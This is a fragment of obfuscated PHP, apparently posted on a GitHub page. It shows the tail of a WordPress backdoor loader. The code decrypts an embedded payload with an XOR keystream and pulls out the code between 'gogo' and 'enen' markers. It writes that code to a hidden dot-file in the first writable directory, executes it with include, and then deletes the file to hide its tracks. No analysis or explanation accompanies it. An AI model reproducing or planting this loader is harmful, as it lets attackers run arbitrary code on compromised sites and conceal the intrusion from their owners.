while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } | |
return $fd^$ff; | |
} | |
} | |
$reqw = $ay($ao($oa("$pass"), 'wp_function')); | |
preg_match('#gogo(.*)enen#is', $reqw, $mtchs); | |
$dirs = glob("*", GLOB_ONLYDIR); | |
foreach ($dirs as $dira) { | |
if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } | |
$subdirs = glob("$dira/*", GLOB_ONLYDIR); | |
foreach ($subdirs as $subdira) { | |
if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } | |
} | |
} | |
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } | |
fwrite($hdl, "<?php\n$mtchs[1]\n?>"); | |
fclose($hdl); | |
include("{$eb}.$algo"); | |
unlink("{$eb}.$algo"); | |
$npDcheckClassBgp = 'aue'; | |
$zeeta = "yup"; | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment